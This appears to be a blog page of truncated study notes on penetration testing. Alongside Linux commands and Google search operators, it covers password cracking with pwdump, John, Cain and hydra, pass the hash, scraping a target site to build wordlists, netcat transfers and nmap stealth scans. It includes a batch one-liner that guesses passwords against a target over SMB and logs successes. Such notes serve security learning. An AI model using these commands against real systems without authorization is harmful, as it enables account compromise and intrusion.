
Posts

linux commands: find / -name ls &, ps, netstat

> useradd -d /home/fred fred
> system-config-users
> id <username> = to list the id number for the user/group
> passwd
> whoami
> su <root_username>
> linux file system structure = to be added
> ls -la = different colors mean different things = to be added
> how to mount a cdrom or flash drive = to be added
> locate <program_name>
> find / -name <file_to_look_for>; find / -name ls & ... runs in the background when & is appended to the command
> less <file_to_see_the_content_of>; ls /dev | less
> echo $PATH
> which ls = you can see where the ls command is being run from
> ps aux | less or top
> bg or fg = to start the program in the background or foreground
> jobs = to list all processes running in the background
> gedit /etc/sysconfig/network-scripts/ifcfg-eth0
> service network restart
> netstat -nap | less = show listening ports
> /usr/sbin/lsof -i | less = li...

Google Search Directive - sites and links

Google searches are case insensitive.

site: search only within the given domain. If you include site: in your query, Google will restrict your search results to the site or domain you specify. For example, [ admissions site:www.lse.ac.uk ] will show admissions information from London School of Economics' site and [ peace site:gov ] will find pages about peace within the .gov domain. You can specify a domain with or without a period, e.g., either as .gov or gov. OR [ site:www.lse.ac.uk admissions ] OR [ site:www.lse.ac.uk filetype:ppt ] will look for all ppt files in that particular site OR [ site:abcd.net ppt ] will not only get ppt files but also web pages that include the text ppt.

link: Shows all sites linked to a given site. The query link:URL shows pages that point to that URL. For example, to find pages that point to Google Guide's home page, enter: [ link:www.googleguide.com ]

related: Shows similar pages. The quer...

Pwd crack, pwdump, john, cain, hydra

========================================
book 4 pg 165; file 4.6 31:37
* if you have no access to hashes, you may want to consider password guessing (using tools like thc-hydra) or sniffing clear text or challenge/response exchanges (e.g., cain, tcpdump, etc.)
* if you have hashes and want to crack the password:
  - for salted hashes from unix-like systems, use traditional password cracking (John the Ripper)
  - for lanman / nt hashes from windows, use rainbow tables or traditional password cracking (john or cain)
* if you have lanman challenge/response, NTLMv1 or NTLMv2 captures, use password cracking (cain)
* if you have lanman / nt hashes and smb access, use pass the hash
========================================
file 4.4 3:52 minute
Pwdump tools
a. pwdump3 to pwdump6
b. fgdump
c. pwdump7
========================================
john
* john.pot file = when john cracks a password, it displays the result on the screen and stores it in the john.pot file. John will not load passwords that it has alre...

Building Password dictionary

file 4.2, 25.40 minute tested...
# cewl www.ignitetechnologies.in -d 2 -w /root/Desktop/dict.txt
cewl <url> -d <depth> -w <path>
cewl – the tool being used
<url> – the URL that you want to use as the foundation of your dictionary
-d <depth> – the number of links you want it to follow while creating your dictionary
-w <path> – the path where you want to store all the possible passwords

For example, in the terminal of kali type: [source: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing/]
$ mkdir /tmp/source
$ cd /tmp/source
$ wget -r -l [N] [target_website]
$ cd ..
$ grep -h -r "" source | tr '[:space:]' '\n' | sort | uniq > wordlist.lst
$ grep -v '<' wordlist.lst > newlist.lst
-r pulls pages recursively from the target website, following links to a depth of N (-l) pages.
grep to omit file names from the ou...

FOR Loops

>> FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply" --> is a ping sweep
>> FOR /F %i in (password.lst) do @echo %i & @net use \\target_ip_addr %i /u:[username] 2>nul && pause --> password guess; instead of pause, we could append our results to a file with: && echo Username: %i >> success.txt
>> FOR /L %i in (1,1,255) do echo %i & ping -n 5 127.0.0.1 & cls -->
[command1] & [command2] --> run multiple commands
[command1] && [command2] --> run multiple commands only if the prior command succeeded without error
you could use the echo command to build a script line by line by running the following command several times, varying the line each time you run it:
c:\> echo [line] >> file.bat
The FOR loop variable must be changed from %[var] to %%[var] to work in a batch file. Place two percent signs in front of each variable name.
=========================
windows>for /L %...

Netcat / Nc. without e support, scan using nc which ports are listening

how to move files between 2 systems using nc. works on both linux and windows.
on the source/sending machine:
# nc -lvp 2222 < sending_this_file.txt
on the target/receiving machine:
# nc -nv target_ip_address 2222 > receiving_this_file.txt

Building off of the previous example, we can accomplish more useful tasks. Because we are establishing a regular TCP connection, we can transmit just about any kind of information over that connection. It is not limited to chat messages typed in by a user. We can use this knowledge to turn netcat into a file transfer program. Once again, we need to choose one end of the connection to listen for connections. However, instead of printing information onto the screen, as we did in the last example, we will place all of the information straight into a file:
netcat -l 4444 > received_file
On the second computer, create a simple text file by typing:
echo "Hello, this is a file" > ...

enumeration

Nmap scripts will cause nmap to do a port scan so they can find out which ports are open, but nmap scripts without a version scan may not properly measure the target's configuration and vulnerabilities, especially for services on non-standard ports. By default nmap will check the top 100 most used ports for TCP and/or UDP.
# nmap -PN -sS target_ip_address -p 1-1024 --packet-trace
[ -PN = indicates that we don't want to ping the target system, just scan it
  -sS = do a SYN scan, also known as a stealth scan or half open scan
  -p = list of the ports to scan
  --packet-trace = makes nmap display the status and packet summary information
  -PB = same as default; use ICMP Echo Request; SYN to TCP 433; ACK to TCP 80, and ICMP Timestamp request (if UID 0)
  -PE = formerly -PI; send ICMP echo request (ICMP type 8)
  ...